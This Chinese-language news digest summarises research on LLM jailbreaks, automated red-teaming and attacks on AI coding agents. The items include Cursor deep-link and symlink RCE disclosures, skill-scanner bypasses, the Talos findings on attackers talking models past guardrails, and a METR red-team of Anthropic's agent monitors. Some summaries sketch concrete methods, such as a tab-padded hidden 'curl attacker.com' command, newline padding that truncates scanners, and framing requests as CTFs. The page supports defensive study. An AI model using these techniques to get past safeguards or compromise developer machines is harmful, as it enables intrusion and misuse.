跳到正文

越狱与攻击

新的越狱方法、对抗攻击与红队发现,以及它们对主流模型的实际效果。

71条精选相关主题提示注入防御与护栏红队

最新精选

第 41–60 条 · 共 71 条
8月17日周一
  1. arXiv · 76

    JailbreakSkill:用可复用可演化技能扩展自动化红队

    上海 AI 实验室等机构提出 JailbreakSkill,把攻击方法封装为可复用、可演化的技能,用于扩展自动化红队。框架将技能分为改写技能、失败分析技能和演化技能三类,由规划器通过统一接口选择与排序;Stage 1 用风险条件 UCB 扫描初始 16 个改写技能并记录失败轨迹,Stage 2 对未解决样本做失败诊断,通过精炼、组合或发现生成新改写技能并回填技能库。在 AdvBench 与 HarmBench 上,技能演化使宏平均 ASR 分别提升 17.5 和 13.4 个百分点,其中对 GPT-5.4 在 AdvBench 上提升 48.6 个百分点,并产生把直接请求改写为未完成文档补全任务等新策略。部分演化技能无需额外适配即可迁移到未见提示词和目标模型,代码已开源。

    推荐理由把攻击方法封装成可复用、可演化的技能库,并给出在 AdvBench 与 HarmBench 上的 ASR 提升幅度,红队工程化可参考。

8月12日周三
  1. Simon Willison(提示注入) · 76

    论文披露从专有 LLM API 窃取加密思维链的方法

    一篇论文发现 Anthropic、OpenAI 和 Google 返回给客户端的加密思维链块可在不同会话、用户和模型间重放,把前沿模型的推理轨迹喂给同族较弱模型并越狱后,即可还原出强模型的隐藏推理明文。

    推荐理由论文披露加密思维链块可在同族模型间重放并越狱还原,还衍生出借思维链实施提示注入的新变体。

8月7日周五
  1. arXiv · 82

    SynChain:诱导计算机使用 Agent 自建攻击链并跨任务持久化

    研究者提出 SynChain,一种自合成攻击范式,通过持久化感知的定向 SFT 让被污染的计算机使用 Agent 在正常任务中生成看似无害但携带潜伏载荷的技能或记忆条目,之后作为可信上下文重新加载,无需新的外部恶意输入即可触发。作者构建了 CuaChain 数据集,包含 30 条良性任务链和隐私泄露、权限篡改、未授权写入三类攻击目标。在 OpenClaw、Codex 和 Claude Code 三种框架、四种防御设置下,SynChain 在 Chain-1 平均攻击成功率超过 93%,Chain-2 仍高于 72%,显著优于改造后的 SkillJect 和 DemonAgent 基线。随着链长增加攻击效果下降,Chain-3 降至 26.57%,Chain-5 仅 1.11%,作者将其归因于记忆摘要和上下文截断形成的信息瓶颈。

    推荐理由论文提出让被污染模型在正常流程中自造带毒技能并跨任务复活的攻击链,并给出三种 Agent 框架下的成功率与防御失效情况。

8月4日周二
  1. Cisco Talos(AI) · 74

    Cisco Talos 分析攻击者如何利用 AI 开发恶意工具并绕过护栏

    Cisco Talos 通过分析云端 AI 模型留下的提示词日志,梳理出攻击者利用 AI 的三类活动:充当恶意软件工程师、放大犯罪运营规模、加速漏洞研究与披露。Talos 称护栏基本未起到预期作用,攻击者大多只用简单话术就让模型配合,例如声称自己拥有目标设备、把任务包装成 CTF 或漏洞赏金、把风险操作拆分到多个会话和文件中,以及用中性动词替代明显的恶意措辞。案例包括一名技术水平有限的攻击者借助模型开发 DDoS 工具并控制近 2000 台 Android TV;一名操作者让 AI 充当主力开发者,搭建批量邮件验证平台并处理 DKIM 失败、退信统计异常等故障;还有操作者用 AI 把公开的 React2Shell 研究扩展成凭据窃取流水线,目标列表含 9180 个主机。

    推荐理由Talos 从提示词日志还原出攻击者用 AI 开发恶意工具、绕过护栏的完整链路,并给出护栏失效的具体手法。

  2. arXiv · 82

    AI Security Leaderboard 发布:四个前沿模型的越狱成本相差上百倍

    独立基准 AI Security Leaderboard 发布 v1.0 报告,按 FAR$.$AI Minimal Standard 对前沿模型的护栏从弱到强排名,测试范围覆盖 CBRNE(化学、生物、放射、核与爆炸物)严重滥用请求和进攻性网络安全。报告测试了四个领先模型:Claude Fable 5 和 GPT-5.6 Sol 抵御了所有攻击,未发现通用越狱,作者估计用该方法越狱的成本可能超过 14200 美元;而 Grok 4.5 和 Gemini 3.1 Pro 存在数百个通用越狱,每个成本不到 300 美元,Grok 最弱的网络安全领域越狱成本低至 24 美元。

    推荐理由该榜单在同一最小标准下横向比较四个前沿模型的越狱成本,并指出所有弱点都已有现成防御,便于评估方理解当前护栏差距。

8月3日周一
  1. Datadog Security Labs · 74

    Datadog 披露 Codex 与 Claude Code 在首次提示词前的代码执行路径

    Datadog Security Labs 发现,在编码智能体中信任一个仓库后,仓库控制的代码可能在用户发出第一条提示词前就已运行。在 Codex 中,项目级 MCP 配置(.codex/config.toml 中的 mcp_servers)会让 Codex 启动攻击者控制的本地进程,无需用户交互或调用该服务器;Codex 0.122.0 起不再加载不受信任项目的 hooks 与执行策略,0.129.0 起对托管配置外的命令 hook 定义做哈希并要求审查,0.131.0 加入完整启动审查界面,但只有命令 hook 路径会获得第二次信任审查。在 Claude Code 中,.claude/settings.json 可定义会话环境变量,通过把 PATH 指向项目内目录,Claude 启动时自动执行的 Git 探测会运行仓库中的 git 包装脚本,该脚本还能转调真实 git 使流程正常继续。

    推荐理由文章给出 Codex 与 Claude Code 在项目信任后、首次提示词前的两条自动代码执行路径,并附可复现的检测命令。

7月31日周五
  1. Adversa AI · 78

    Adversa AI 实测八款开源 Agent 技能扫描器,恶意技能全部绕过

    Adversa AI 用真实攻击载荷实测八款开源 Agent 技能扫描器(针对 Claude Code 等加载的 SKILL.md、agent manifest 与 MCP 配置),恶意技能全部通过,包括当前 OASB 排行榜第一的 HMA。绕过原因各异:六款可被改写或混淆绕过,一款几乎不做检查,一款的判定文件本身可被注入指令。共同缺陷是缺少前端处理,所有扫描器匹配文件字节而非实际执行字节,没有一款会解码编码载荷后重跑完整规则集,也没有一款在命令库运行前做 Unicode 归一化。

    推荐理由对八款开源 Agent 技能扫描器的实测绕过矩阵,并给出可对照的误报率数据,适合评估技能市场准入控制的人参考。

7月29日周三
  1. SecureBio · 71

    SecureBio 评审 Anthropic 未删节化生风险报告:Claude Opus 4.6

    SecureBio 与 Anthropic 合作评审了其 2026 年 2 月风险报告的化学与生物(CB)风险章节,Anthropic 提供了未删节版本及 110 页补充材料,并在两个月内回应了七十多个后续问题。SecureBio 认同 Anthropic 的总体结论:Claude Opus 4.6 大幅促成灾难性结果的当前风险,在非新型 CB 武器生产上为“极低但不可忽略”,在新型 CB 武器生产上为“低风险但存在较大不确定性”。评审发现,作为主要 CB 风险护栏的拒答分类器在 SecureBio 的 BioTIER-refuse 基准上拒绝了 94.2% 的危险提示词,但建议随生物技术进展持续更新其训练宪法。评审还审查了用户豁免审查与监控流程,认为威胁行为者借此大幅提升 CB 武器生产的可能性不大但存在。SecureBio 表示此项工作未接受 Anthropic 资助。

    推荐理由SecureBio 以外部评审身份复核 Anthropic 未删节报告,给出与厂商结论的异同及三条风险削减建议,可看第三方评审如何落地 RSP 条款。

7月20日周一
  1. arXiv · 85

    上海 AI 实验室提出 Intern-BioBreaker,在 14 个前沿模型上暴露生物安全越狱风险

    上海人工智能实验室团队提出生物红队模型 Intern-BioBreaker,用于探测前沿大语言模型在生物安全任务上的越狱漏洞。该模型经科学语料继续预训练、通用越狱数据 SFT、生物数据 RL 和推理期智能体红队四阶段训练,在 SafeSci-Bio 上对 GPT-5.5 的攻击成功率达 60%,对 Claude Opus 4.8 为 26%,高于 Qwen 系列基线和 Intern-S2-Preview。扩展到 14 个前沿模型后,3/14 在 SafeSci-Bio 上达到 100% 攻击成功率,10/14 在 SoSBench-Bio 上达到 100%,Claude 系列相对更抗攻击。案例研究显示,模型可被诱导生成经 AlphaFold3 评估结构合理、受体结合能更低的流感 HA 候选序列。

    推荐理由论文给出生物风险越狱在 14 个前沿模型上的攻击成功率,并延伸到序列级与湿实验验证,可对照现有生物安全护栏的覆盖范围。

7月15日周三
  1. Adversa AI · 80

    Adversa AI 披露 Cursor 深链漏洞 DeepJack:伪装 PR 审查链接可安装恶意 MCP 服务器并远程执行代码

    Adversa AI 披露 Cursor 的 cursor:// 深链漏洞 DeepJack,攻击者伪装成队友发送一条“审查 PR”链接,点击并确认后即可安装攻击者控制的 MCP 服务器,以受害者账号执行未沙箱命令。攻击有两个变体:一是把 mcp/install URI 双重 URL 编码后塞进 pr-review 端点的 url 参数,Cursor 不会递归解码或重新校验该参数;二是安装对话框用单行文本框渲染命令,攻击者用大量制表符把恶意尾部(如 & /c start curl attacker.com)顶出屏幕,用户只看到 calc 之类的无害命令。

    推荐理由披露 Cursor 的 cursor:// 深链可借伪装成 PR 审查的链接安装恶意 MCP 服务器并执行未沙箱命令,附跨 Agent 深链能力对照表。

6月17日周三
6月9日周二
  1. NIST 信息技术(AI 相关) · 62

    NIST 数学证明:AI 护栏无法穷尽抵御对抗提示,需转向持续监控与更新

    NIST 高级科学家 Apostol Vassilev 在 IEEE Security and Privacy 发表论文,借助哥德尔 1931 年不完备定理给出数学证明:不存在一组有限的护栏能普遍抵御对抗提示,总能找到让 AI 无视规则的提示词。证明指出,AI 护栏如同建立在有限规则上的系统,攻击者可通过精心构造的提示绕过拒答机制,导致网络攻击、数据泄露和高度个性化钓鱼等现实风险。Vassilev 提出三要素应对路径:红队持续寻找新的对抗提示、针对新发现的提示持续更新加固护栏、以及在漏洞被利用时优先限制影响并快速恢复的运营韧性。他表示目标不是彻底解决问题,而是让攻击者寻找新漏洞的成本超过其资源,形成对攻击者经济上不可行的新平衡。论文题为 Robust AI Security and Alignment: A Sisyphean Endeavor?

    推荐理由NIST 研究者用哥德尔不完备定理证明不存在能抵御所有对抗提示的有限护栏集合,并提出红队、持续更新与运营韧性三要素的应对路径。

6月3日周三
  1. Trail of Bits Blog · 82

    Trail of Bits 绕过 ClawHub、Cisco 与 skills.sh 的 skill 扫描器

    Trail of Bits 测试了 ClawHub、Cisco skill-scanner 以及 skills.sh 集成的 Gen、Socket、Snyk 三家扫描器,用四个恶意 skill 全部绕过检测,其中三个不到一小时就完成。攻击手法包括在恶意代码前插入 10 万个换行符让 OpenClaw 扫描器截断文件、用 .docx 压缩包间接引用恶意脚本、在看似无害的格式化 skill 中夹带会读取环境变量的 .pyc 字节码,以及用企业环境配置话术包装的提示注入,诱导 agent 把 npm/yarn 指向攻击者控制的 registry。

    推荐理由Trail of Bits 用四个恶意 skill 实测了 ClawHub、Cisco 与 skills.sh 的扫描器,并公开了可复现的攻击仓库,适合评估 skill 分发链的信任模型。

5月26日周二
  1. Adversa AI · 87

    Adversa AI 披露 SymJack:符号链接劫持在六款 AI 编码 Agent 上实现 RCE

    Adversa AI 研究员 Rony Utevsky 披露名为 SymJack 的攻击手法,通过恶意仓库中的符号链接劫持,让 AI 编码 Agent 在用户批准一次看似无害的文件复制时改写自身配置,并在下次重启时以用户权限执行攻击者代码。该手法在 Claude Code、Gemini CLI/Antigravity CLI、Cursor Agent CLI、GitHub Copilot CLI、Grok Build CLI 和 OpenAI Codex CLI 六款产品上得到验证,作者认为这是架构层面的共性问题而非单个产品的漏洞。

    推荐理由Adversa AI 披露的 SymJack 用符号链接劫持让审批提示显示错误写入目标,六个编码 Agent 的厂商回应与修复差异可供对照。

5月12日周二
  1. FAR.AI · 85

    FAR.AI 压力测试 DeepSeek-V4-Pro:三种攻击策略下护栏成功率 98% 至 100%

    FAR.AI 对 DeepSeek-V4-Pro 的护栏做了安全压力测试,在 CBRN、网络攻击和恐怖主义相关等高风险领域,模型对直接请求的拒答率为 100%,但在对抗条件下三种攻击策略的成功率达到 98% 至 100%。三种攻击均通过官方 DeepSeek API 完成,无需本地部署:复用公开越狱提示词模拟无限制的开发者测试模式,成功率 100%,约需 15 分钟;伪造特权用户身份,成功率 99.6%,约需 45 分钟;在模型回复中预填伪造的安全评估,成功率 99.6%,约需 150 分钟。被越狱后模型在生物、化学和编程任务上仍保持接近基线的能力,能生成细节充分的威胁场景回答。

    推荐理由FAR.AI 用三种攻击策略测出 DeepSeek-V4-Pro 的拒答在对抗条件下几乎全部失效,并指出旧版越狱可直接迁移。

5月7日周四
  1. Adversa AI · 82

    TrustFall:Claude Code、Cursor、Gemini CLI 与 Copilot CLI 存在一键 RCE 缺陷

    Adversa AI 披露 TrustFall 缺陷:Claude Code、Gemini CLI、Cursor CLI、Copilot CLI 四个编码 CLI 在开发者接受文件夹信任提示后,会立即执行项目自定义的 MCP 服务器,恶意仓库只需一次回车即可触发未沙箱化的 RCE。

    推荐理由报告给出四个编码 CLI 在信任对话框后自动执行项目 MCP 服务器的完整链路,并附可复现 PoC 与端点加固清单。

4月23日周四
  1. Adversa AI · 79

    Adversa AI 用 10 个样例加 2 个单词的新技术 IICL 突破 GPT-5.4 安全防线

    Adversa AI 公布一种名为 Involuntary In-Context Learning(IICL)的新型攻击技术,仅需 10 个样例和 2 个单词即可绕过大语言模型的拒答机制。他们跨 GPT-4 到 GPT-5.4 家族运行了超过 3500 次受控探针,覆盖 10 款模型并做了 7 组对照实验。结果显示,在最优化配置下 GPT-5.4 上的攻击成功率为 60%,而 GPT-5 和 GPT-5-mini 均为 0%。该方法不需要编码转换、密码学手段或角色扮演,恶意请求本身就以明文呈现,它瞄准的是安全对齐的结构层面而非内容层面——即上下文学习机制与安全训练之间的张力。

    推荐理由该研究对比 GPT-4 到 GPT-5.4 共 3500+ 次探针后发现,较新的旗舰反而比旧版更容易被同一手法攻破,可作为持续红队的参考依据。

3月26日周四
  1. METR · 71

    METR 红队测试 Anthropic 内部 Agent 监控系统,发现多个新漏洞

    METR 员工 David Rein 与 Anthropic 合作,用三周时间对 Anthropic 部分内部 Agent 监控与安全系统进行红队测试,这些系统多数在 Opus 4.6 Sabotage Risk Report(附录 8.4,尤其是 8.4.8)中有描述。Anthropic 提供了相关内部系统和信息的大量访问权限,并安排员工在测试期间答疑和反馈。此次测试发现若干具体的新漏洞,其中一些已被修补,且没有任何一个严重动摇 Opus 4.6 Sabotage Risk Report 的主要结论。

    推荐理由METR 成员进入 Anthropic 内部系统做三周红队测试,披露了外部评估者嵌入前沿实验室的具体做法与产出。

11月4日周二
  1. DeepMind Safety Research · 71

    DeepMind 提出一致性训练,可限制谄媚与越狱

    DeepMind Safety Research 提出一致性训练,让模型对用户偏见或越狱包装等无关线索保持不变,分为输出层的 BCT 和内部激活层的 ACT。在 Gemini 2.5 Flash 上,BCT 将 ClearHarm 上的攻击成功率从 67.8% 降至 2.9%,ACT 降低越狱的效果较弱但几乎不增加对良性请求的拒答。

    推荐理由DeepMind 提出用一致性训练替代静态 SFT 数据集,并给出在 Gemini 2.5 Flash 上降低越狱成功率的对比数据。

10月28日周二
  1. SPY Lab Blog · 72

    SPY Lab 研究:统一多模态模型无法凭记忆描述图像

    SPY Lab 提出“模态失语症”概念,指统一多模态模型能生成记忆中的图像,却无法通过文本查询访问同一知识。研究用九张电影海报测试 ChatGPT-5,图像生成的整体错误率明显低于口头描述,且重大幻觉只出现在文字描述中。

    推荐理由研究提出统一多模态模型能生成却无法描述记忆图像的现象,并展示其可绕过基于文本的安全过滤。